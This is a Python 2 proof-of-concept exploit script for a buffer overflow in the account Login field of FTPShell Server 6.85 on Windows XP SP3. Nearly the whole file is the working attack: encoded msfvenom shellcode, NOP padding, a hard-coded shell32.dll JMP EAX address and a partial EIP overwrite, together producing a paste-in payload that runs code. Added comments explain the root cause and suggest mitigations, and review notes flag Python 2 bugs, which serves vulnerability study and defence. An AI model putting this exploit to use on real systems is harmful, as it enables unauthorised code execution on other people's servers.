#!/usr/bin/python
# Exploit Title: FTPShell Server 6.85 - Add Account Buffer Overflow
# Date: December 2nd, 2019
# Exploit Author: boku
# Vendor Homepage: http://www.ftpshell.com/index.htm
# Software Link: http://www.ftpshell.com/downloadserver.htm
# Program Name: FTPShell Server (Secure Plus edition)
# Version: Version 6.85
# Tested on: Windows XP Professional (32-bit)- 5.1.2600 Service Pack 3 Build 2600
# Recreate:
# - Install FTPShell Server v6.85
# - open 'FTPShell Server Administrator'
# - Click button 'Manage FTP Accounts..'
# - Click button 'Configure accounts..'
# - Click button 'Add'
# - Run python script & transfer 'poc.txt' to windows box
# - Open 'poc.txt' & select-all, then copy
# - Paste poc.txt text blob into 'Login' text-box
# - Press button 'OK'; program will crash & shellcode will execute
# --- Payload builder -------------------------------------------------------
# Writes ONE string to 'poc.txt' (the single f.write call below), laid out as:
#   shellcode | junk1 (NOP pad) | jmpEax (4-byte address) | junk2 (NOP pad) | ecx (3 bytes)
# The two offsets (708 and 1568) and every address in the comments below come
# from the author's crash analysis on the Windows XP SP3 target named in the
# file header. The shell32.dll address is only usable because that module is
# not rebased on that system (see the "aslr&rebase: false" note), so all of
# these values are environment-specific rather than general.
# Defender's view: the root cause is a missing length check on the 'Login'
# field of the account dialog -- a value of roughly 1.5 KB is enough to corrupt
# a pointer the program later dereferences (control of ECX at offset 1568).
# The mitigation is input-length validation on that field / a vendor fix; an
# account name made mostly of 0x90 bytes is also a cheap thing to flag in a
# configuration audit of the server's account store.
# NOTE(review): this is Python 2 code -- the `print` statements below and the
# concatenation of the b"" shellcode with the '\x90' str padding would both
# fail under Python 3.
blt = '\033[92m[\033[0m+\033[92m]\033[0m ' # green success bullet
err = '\033[91m[\033[0m!\033[91m]\033[0m ' # red fail bullet
try:
# Opened without a `with` block: the handle is only closed on the success
# path (the f.close() below); an exception in between leaves it to the GC.
f = open('poc.txt', 'w') # open file for write
# Instructions @ Crash:
# 1. mov ecx,[esi+7c0];
# 2. mov eax,[ecx]; lea edx, [ebp-4]; push edx;
# 3. call [eax+2c4];
# exploit leaves 708 bytes for shellcode.
#msfvenom -p windows/exec CMD='calc.exe' -a x86 --platform windows -b '\x00' -v shellcode -f python
#x86/shikata_ga_nai chosen with final size 220
# Encoded payload (220 bytes per the note above); 0x00 is excluded because the
# program terminates the pasted text at the first NUL (see the note near `ecx`).
shellcode = b""
shellcode += b"\xbb\x4f\x79\xd7\xce\xda\xde\xd9\x74\x24\xf4"
shellcode += b"\x5a\x2b\xc9\xb1\x31\x31\x5a\x13\x83\xea\xfc"
shellcode += b"\x03\x5a\x40\x9b\x22\x32\xb6\xd9\xcd\xcb\x46"
shellcode += b"\xbe\x44\x2e\x77\xfe\x33\x3a\x27\xce\x30\x6e"
shellcode += b"\xcb\xa5\x15\x9b\x58\xcb\xb1\xac\xe9\x66\xe4"
shellcode += b"\x83\xea\xdb\xd4\x82\x68\x26\x09\x65\x51\xe9"
shellcode += b"\x5c\x64\x96\x14\xac\x34\x4f\x52\x03\xa9\xe4"
shellcode += b"\x2e\x98\x42\xb6\xbf\x98\xb7\x0e\xc1\x89\x69"
shellcode += b"\x05\x98\x09\x8b\xca\x90\x03\x93\x0f\x9c\xda"
shellcode += b"\x28\xfb\x6a\xdd\xf8\x32\x92\x72\xc5\xfb\x61"
shellcode += b"\x8a\x01\x3b\x9a\xf9\x7b\x38\x27\xfa\xbf\x43"
shellcode += b"\xf3\x8f\x5b\xe3\x70\x37\x80\x12\x54\xae\x43"
shellcode += b"\x18\x11\xa4\x0c\x3c\xa4\x69\x27\x38\x2d\x8c"
shellcode += b"\xe8\xc9\x75\xab\x2c\x92\x2e\xd2\x75\x7e\x80"
shellcode += b"\xeb\x66\x21\x7d\x4e\xec\xcf\x6a\xe3\xaf\x85"
shellcode += b"\x6d\x71\xca\xeb\x6e\x89\xd5\x5b\x07\xb8\x5e"
shellcode += b"\x34\x50\x45\xb5\x71\xae\x0f\x94\xd3\x27\xd6"
shellcode += b"\x4c\x66\x2a\xe9\xba\xa4\x53\x6a\x4f\x54\xa0"
shellcode += b"\x72\x3a\x51\xec\x34\xd6\x2b\x7d\xd1\xd8\x98"
shellcode += b"\x7e\xf0\xba\x7f\xed\x98\x12\x1a\x95\x3b\x6b"
# 3. call [eax+2c4];
# - Hexadecimal 0x2c4 = 708 decimal
# Pad so that shellcode+junk1 is exactly 708 bytes.
# NOTE(review): if the shellcode ever exceeded 708 bytes the multiplier goes
# negative and junk1 silently becomes '' -- no error is raised.
junk1 = '\x90' * (708-len(shellcode))
# - The call [eax+2c4] instruction will pass execution to the address located at EAX+708
# - Setting [EAX+708] to an existing JMP EAX instruction will pass execution to our shellcode
# - 0x7c9ef4c9 jmp eax | (Execute&Read) shell32.dll; aslr&rebase: false
# Little-endian encoding of the address above; tied to this exact shell32.dll
# build and load address, so it does not transfer to other systems.
jmpEax = '\xc9\xf4\x9e\x7c'
# 1. mov ecx,[esi+7c0];
# - ESI = 0x0012C108
# - esi+7c0 is in our supplied buffer, on the stack, at the time of the crash.
# - Control ECX @ offset 1568 bytes
# Pad so that everything before `ecx` is exactly 1568 bytes (same silent
# negative-multiplier caveat as junk1).
junk2 = '\x90' * (1568-len(shellcode+junk1+jmpEax))
# 2. mov eax,[ecx];
# - ECX = 0x0012B768 = PTR (located on Stack) to the beginning of our shellcode in the Heap
# - EIP 3-Byte Overwrite - '\x68\xb7\x12'
ecx = '\x68\xb7\x12' # - EIP 3-Byte Overwrite - '\x68\xb7\x12
# - The '\x00' is supplied by the program when pressing the 'OK' button
# - eax is now set to the address of our shellcode.
# One write of the whole concatenated buffer (Python 2 str/bytes mix, see top).
f.write(shellcode+junk1+jmpEax+junk2+ecx)
f.close() # close the file
print blt + 'poc.txt created successfully'
# Bare except: swallows every exception type (including KeyboardInterrupt) and
# discards the real error; `except IOError as e:` reporting `e` would be the
# narrower, more informative form.
except:
print err + 'poc.txt failed to create'